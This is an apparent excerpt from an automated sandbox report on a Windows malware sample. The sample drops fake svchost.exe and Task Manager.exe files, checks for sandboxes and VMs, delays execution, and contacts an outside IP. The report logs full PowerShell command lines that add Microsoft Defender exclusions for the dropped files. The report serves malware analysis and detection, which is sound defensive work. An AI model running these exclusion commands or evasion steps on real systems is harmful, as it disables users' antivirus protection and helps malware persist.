                        Source: All function.cmd, 00000002.00000002.2133502093.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Task Manager.exe, 00000004.00000000.2121593204.00000000003B2000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: SBIEDLL.DLL9AUJ4DGGKLF9MMSEGCIIH9SOMMOHL9MTZTVFW6HQFYGY1R9WWC6GKEOM2R9VUUGG3JHCP1TDWLBEIDRPUDTB8RI9EVZGH4CK47SVFDWPBETDSSLCPLVA90WDHOGC8UWEMFQ3KGP8XYCQKYPAB99JQLIRT3HLIYKB2PHCLCGN48L9NG9LK8ZK0H6BRCOAV5IREHFAGTAXYJB9V9HQELNLDRDGMKYY6ZZ4QXFV02DJ9OCQR4YUGA6Q6TXVMGMHXJUKNWSSK9IDH9Y2CXSDRSASGKY5DJBSRDAWZG9XZN5GTKG8SBQFD687VNT6JSYADPL90DMZVWBFDAB3HDHP7QEFGLAY4Y3D9RRDP3G7B0Q9ISVRIY6V2IPZ7HHAR93BHT967MANEW7F42SWVAVM0SUJM0INFO
                        Source: dLRcE11Dkl.exe, 00000000.00000002.2121511846.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.2116819375.0000000000A22000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: SBIEDLL.DLL15QACTVD4DKT05YV7OTIVCIVV1K35SANJVPJOQRQIRGKSOY0WQ1KKYDM8SK4RVB8WOW7UROITUO1KUWHGNKZ4UEAFJPWTZ609TFF1QLLYWMT2SMJ2JGTZL6U4MEWY1ILTP1WQPCCLKULAPQWFCHHHE1LEMMCQWNZVV46Q0CVTCNMAHU1QH6P2WXHEHFWBHH8YDDGKQL91LVLIT8CUVFN3G2TQ4NXZP8WH1HRTJZ4J1GYTMENCQQRHRZATG1MZV1TZAEEFYEAL4GXY1P0TTZ1BQIQIOPH4DZFAQWLDH6ANQCX185RVKAQDWSKVCPGQGAPYNE1E11ZJHRF37SEHWDZIQ7RXCO5RGINFO
                        Source: All function.exe, 00000005.00000002.2171697039.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, BLACKGODDOM V.2 GOD BY LA.exe, 00000007.00000000.2169879127.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, BLACKGODDOM V.2 GOD BY LA.exe.5.drBinary or memory string: SBIEDLL.DLLINFO
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeMemory allocated: 8E0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeMemory allocated: 1A7F0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\All function.cmdMemory allocated: 2E00000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\All function.cmdMemory allocated: 1AE90000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 2DF0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1ADF0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeMemory allocated: B00000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeMemory allocated: 1A5F0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\All function.exeMemory allocated: 12A0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\All function.exeMemory allocated: 1ADF0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeMemory allocated: 1450000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeMemory allocated: 1AFF0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\All function.cmdThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\All function.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3536
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6181
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5966
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3718
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7297
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2244
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6508
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1456
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6186
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1713
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6960
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1981
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5777
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1785
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exe TID: 1372Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmd TID: 2348Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exe TID: 3260Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4044Thread sleep time: -14757395258967632s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3984Thread sleep time: -12912720851596678s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2120Thread sleep count: 7297 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2120Thread sleep count: 2244 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6564Thread sleep time: -7378697629483816s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7012Thread sleep count: 6508 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7132Thread sleep count: 1456 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5164Thread sleep time: -5534023222112862s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3632Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4616Thread sleep time: -3689348814741908s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4560Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3052Thread sleep count: 6960 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4596Thread sleep count: 1981 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2012Thread sleep time: -6456360425798339s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6564Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5908Thread sleep count: 5777 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4144Thread sleep time: -4611686018427385s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5784Thread sleep count: 1785 > 30
                        Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: BLACKGODDOM V.2 GOD BY LA.exe.5.drBinary or memory string: vmware
                        Source: All function.exe, 00000005.00000002.2170899251.0000000001175000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7
                        Source: All function.exe, 00000005.00000002.2173442106.000000001B82A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\.
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Roaming\svchost.exe; Network Connect: 208.95.112.1 80
Source: C:\Users\user\AppData\Roaming\svchost.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Users\user\AppData\Roaming\Task Manager.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Task Manager.exe'
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe'
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Users\user\AppData\Roaming\svchost.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Users\user\AppData\Roaming\Task Manager.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Task Manager.exe'
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe'
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Users\user\AppData\Roaming\svchost.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe; Process created: C:\Users\user\AppData\Roaming\All function.cmd "C:\Users\user\AppData\Roaming\All function.cmd"
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe; Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\All function.cmd; Process created: C:\Users\user\AppData\Roaming\Task Manager.exe "C:\Users\user\AppData\Roaming\Task Manager.exe"
Source: C:\Users\user\AppData\Roaming\All function.cmd; Process created: C:\Users\user\AppData\Roaming\All function.exe "C:\Users\user\AppData\Roaming\All function.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Users\user\AppData\Roaming\svchost.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
Source: C:\Users\user\AppData\Roaming\Task Manager.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Task Manager.exe'
Source: C:\Users\user\AppData\Roaming\Task Manager.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Task Manager.exe'
Source: C:\Users\user\AppData\Roaming\All function.exe; Process created: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe "C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe"
Source: C:\Users\user\AppData\Roaming\All function.exe; Process created: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe "C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe"
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe'
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'BLACKGODDOM V.2 GOD BY LA.exe'
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe; Queries volume information: C:\Users\user\Desktop\dLRcE11Dkl.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\All function.cmd; Queries volume information: C:\Users\user\AppData\Roaming\All function.cmd VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe; Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Task Manager.exe; Queries volume information: C:\Users\user\AppData\Roaming\Task Manager.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\All function.exe; Queries volume information: C:\Users\user\AppData\Roaming\All function.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
